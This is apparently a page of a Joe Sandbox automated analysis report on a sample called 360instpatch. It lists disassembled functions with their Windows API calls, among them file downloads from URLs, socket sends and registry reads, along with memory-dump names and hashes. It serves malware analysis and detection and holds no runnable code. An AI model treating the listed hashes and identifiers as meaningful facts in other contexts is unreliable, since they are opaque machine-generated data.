                                                                                                                                                                                                              • API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1533324876-0
                                                                                                                                                                                                              • Opcode ID: f9891dff92863539de091feb7769ab0f5392a46d721d694a34b42bd7deed619b
                                                                                                                                                                                                              • Instruction ID: 92d28c26a6f24dcdd7f8ec39a7fd8ab1f2a513c893ba9804309a57e98b469600
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9891dff92863539de091feb7769ab0f5392a46d721d694a34b42bd7deed619b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74019671207529AF97115F64ACC8CBFB7ECEF5939A7100569F516D2190FF60CC2386A1
                                                                                                                                                                                                              Function 6BF231EC Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$ConnectConnectionsEnumStatus
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3492228599-0
                                                                                                                                                                                                              • Opcode ID: b875f1eaeb297c05ba299e77586ee4205f1b1abc62d5e2177df0b2fcf5b7f360
                                                                                                                                                                                                              • Instruction ID: 20712d1d12b20ccf7baffa022cb2c5ba85bb6964f31b43305d6afb9b2a1477cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b875f1eaeb297c05ba299e77586ee4205f1b1abc62d5e2177df0b2fcf5b7f360
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76116DB3D016099FEB30CEF0DC81ADE77B8AB45309F200429E919DA151E77C96488F61
                                                                                                                                                                                                              Function 00B5683D Relevance: 6.1, APIs: 4, Instructions: 59filenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00B56871
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B568A0
                                                                                                                                                                                                              • URLDownloadToCacheFileW.URLMON(00000000,?,?,00000104,00000000,00000000), ref: 00B568B8
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?), ref: 00B568C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Download$CacheDelete_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1835763934-0
                                                                                                                                                                                                              • Opcode ID: dd7f118612c70a8a37e895db5018f9088d8944f231d3ea592a0b2c7876a57f03
                                                                                                                                                                                                              • Instruction ID: d8bb258247f3e101308fb6b0e62dc7eb3c369124f1e20e12803f1a81532a1edf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd7f118612c70a8a37e895db5018f9088d8944f231d3ea592a0b2c7876a57f03
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801C471511118AACB20AB658C45FEFBBFCDF49B55F8044E6B904D3041EA70DE85CAE5
                                                                                                                                                                                                              Function 6CDA5B5C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CDE23D1: __wfsopen.LIBCMT ref: 6CDE23DE
                                                                                                                                                                                                              • __filelength.LIBCMT ref: 6CDA5B7E
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CDA5B8D
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __FF_MSGBANNER.LIBCMT ref: 6CDDD4A1
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __NMSG_WRITE.LIBCMT ref: 6CDDD4A8
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: RtlAllocateHeap.NTDLL(00000000,6CDDDF44,?,?,?,?,6CDDDF53,?), ref: 6CDDD4F5
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CDA5BA1
                                                                                                                                                                                                              • __fread_nolock.LIBCMT ref: 6CDA5BAB
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: __lock.LIBCMT ref: 6CDDD566
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: ___sbh_find_block.LIBCMT ref: 6CDDD571
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: ___sbh_free_block.LIBCMT ref: 6CDDD580
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: HeapFree.KERNEL32(00000000,6CDDDF53,6CE25220,0000000C,6CDE7673,00000000,6CE25648,0000000C,6CDE76AD,6CDDDF53,?,?,6CDECAFF,00000004,6CE257F8,0000000C), ref: 6CDDD5B0
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: GetLastError.KERNEL32(?,6CDECAFF,00000004,6CE257F8,0000000C,6CDE5FE1,6CDDDF53,?,00000000,00000000,00000000,?,6CDEAD80,00000001,00000214), ref: 6CDDD5C1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__filelength__fread_nolock__lock__wfsopen_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 82526466-0
                                                                                                                                                                                                              • Opcode ID: 5aba18f1d556aa126930132d2329023f6042ad67680abbeeb40366fe6909c15a
                                                                                                                                                                                                              • Instruction ID: d51a491dd9c339475569e58205ee73ab89435bcb5ce474ce76b4b46f6e6735e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aba18f1d556aa126930132d2329023f6042ad67680abbeeb40366fe6909c15a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F01D472500705BBEB149BA5DC84FDF3BACDF45268F20002AF90096A91EB71EA1487F4
                                                                                                                                                                                                              Function 6BF30345 Relevance: 6.1, APIs: 4, Instructions: 53networkCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAAsyncSelect.WS2_32(?,00000000,?,00000000), ref: 6BF30382
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000002), ref: 6BF3038D
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 6BF303A3
                                                                                                                                                                                                              • WSACancelAsyncRequest.WS2_32(?), ref: 6BF303D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Async$CancelRequestSelectclosesocketshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3577682533-0
                                                                                                                                                                                                              • Opcode ID: d5d572a25864531a9eeaaa5de6fc549085243c5861b85ef4b332a4cf4532b5d7
                                                                                                                                                                                                              • Instruction ID: 866241a4344cfe2464fe9b7915a5f1fae79280494f49bde7d9a9c586a56f0e08
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d572a25864531a9eeaaa5de6fc549085243c5861b85ef4b332a4cf4532b5d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2511A0332107109BEB209F75D849B6B73E5AF45B15F00469EE066826B0CBBCE8658B98
                                                                                                                                                                                                              Function 6BF2FCFE Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF2FD34
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF2FD46
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 6BF2FD52
                                                                                                                                                                                                              • sendto.WS2_32(00000784,00000000,6BF33743,6BFCC814,00000000,00000010), ref: 6BF2FD6C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsethtonlhtonssendto
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2645352339-0
                                                                                                                                                                                                              • Opcode ID: 18c2142848b6ecbfbcb8a8f41f4bb71463fa4e0cd50b189a28b2b65025146f7e
                                                                                                                                                                                                              • Instruction ID: da7618be4962ad8557b9a11dfb9feceb0a6c9d7902623e921cee05af5b93e8f1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18c2142848b6ecbfbcb8a8f41f4bb71463fa4e0cd50b189a28b2b65025146f7e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D112776910209AFDF019FA4C806EEF7BB5EF09710F10045AF902A6260D775EA64DBA1
                                                                                                                                                                                                              Function 00B4667F Relevance: 6.0, APIs: 4, Instructions: 43windowtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadIconW.USER32(000000CD), ref: 00B46699
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,00000284), ref: 00B46703
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,00000284), ref: 00B4670B
                                                                                                                                                                                                              • SetTimer.USER32(?,00002711,000007D0,00000000), ref: 00B4671B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Icon$NotifyShell_$LoadTimer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2558709860-0
                                                                                                                                                                                                              • Opcode ID: 390a1c534c1ee718319296847bcae2a86a5863cb37d0ce4afeba94ec3738cac2
                                                                                                                                                                                                              • Instruction ID: 372711089204149eb8c9f4a9544b7f82174baeb52d51aa69f8d33ec84e5e8f6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 390a1c534c1ee718319296847bcae2a86a5863cb37d0ce4afeba94ec3738cac2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2016DB4501701DFE7208F64C888F97BBF9EB49348F00482EE5A9A7241C7B56A54CB51
                                                                                                                                                                                                              Function 6BEF79B9 Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,00000000), ref: 6BEF79DA
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,?,?), ref: 6BEF7A01
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEF7A0B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6BEF7A14
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseErrorLastOpenQueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 75635995-0
                                                                                                                                                                                                              • Opcode ID: 39af0ef5e6a05549e1f8af035daf1a0e1e6f03123da52a3ec464aa45570a2ecb
                                                                                                                                                                                                              • Instruction ID: 1b43c2bcd80f24857ad94aad2cc34ab7dc1ad8b8724696f49a03057ee43d3f3d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39af0ef5e6a05549e1f8af035daf1a0e1e6f03123da52a3ec464aa45570a2ecb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6201E476A00209AFDF41DF94D945BCE7BB8AB08305F1040A6FA05E6190E670DA289B61
                                                                                                                                                                                                              Function 6BF272B1 Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 6BF272D2
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,00000000), ref: 6BF272F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF27303
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6BF2730C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseErrorLastOpenQueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 75635995-0
                                                                                                                                                                                                              • Opcode ID: c6189c4deb9c9f5d52119e9af330ffc07678e868dd0cb43d9ca6105283f3f5ee
                                                                                                                                                                                                              • Instruction ID: ff78841eb5aa2f4878494cbdaca7dcff62da7e4c15458a55d4e9472df45b0390
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6189c4deb9c9f5d52119e9af330ffc07678e868dd0cb43d9ca6105283f3f5ee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB01B676A0020DFFDF01DFA4D945BDE7BB8BB04715F1480A5FA05E61A0E770DA289B61
                                                                                                                                                                                                              Function 6BF3AB73 Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6BF3AB86
                                                                                                                                                                                                                • Part of subcall function 6BF42C40: __FindPESection.LIBCMT ref: 6BF42C9B
                                                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 6BF3AB96
                                                                                                                                                                                                              • __freeptd.LIBCMT ref: 6BF3ABA0
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 6BF3ABA9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3182216644-0
                                                                                                                                                                                                              • Opcode ID: 678a5f8b4835cf13f5b1ba1b200f438a2a197707bdc8fe04be2602d02d0b4efe
                                                                                                                                                                                                              • Instruction ID: c7ff775320ca40eb421595c9e599ce9fd893bb3b83ccf785de834b02869b04b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 678a5f8b4835cf13f5b1ba1b200f438a2a197707bdc8fe04be2602d02d0b4efe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAD05E33014612ABEF992B72C959B2E3AD99F412B5F104065BC24C10B1EF3DC4C6C5A0
                                                                                                                                                                                                              Function 00B9E98B Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00B9E99E
                                                                                                                                                                                                                • Part of subcall function 00BA30A0: __FindPESection.LIBCMT ref: 00BA30FB
                                                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 00B9E9AE
                                                                                                                                                                                                              • __freeptd.LIBCMT ref: 00B9E9B8
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00B9E9C1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3182216644-0
                                                                                                                                                                                                              • Opcode ID: a2a8dfee5075b92a74fa2c26f63deb0e5917051b70acaae0612c9a1417a663d2
                                                                                                                                                                                                              • Instruction ID: ec2a6e41dda9ced8e59b78b00d3e44c435b80d3978105177ca2db40e5ebfdf91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2a8dfee5075b92a74fa2c26f63deb0e5917051b70acaae0612c9a1417a663d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0D01731004209AEEB6467B5ED2AB1D76D9DF82360F1500B1B814A60B1EFB4DCC1C926
                                                                                                                                                                                                              Function 6BEEF3BD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_wcsncpy
                                                                                                                                                                                                              • String ID: [%d.] ADD URL: %s
                                                                                                                                                                                                              • API String ID: 2317306155-304945954
                                                                                                                                                                                                              • Opcode ID: eaa651c84c67cdaf0006de13ce248d88fd34fa91c82c0740b0f3904159a72f28
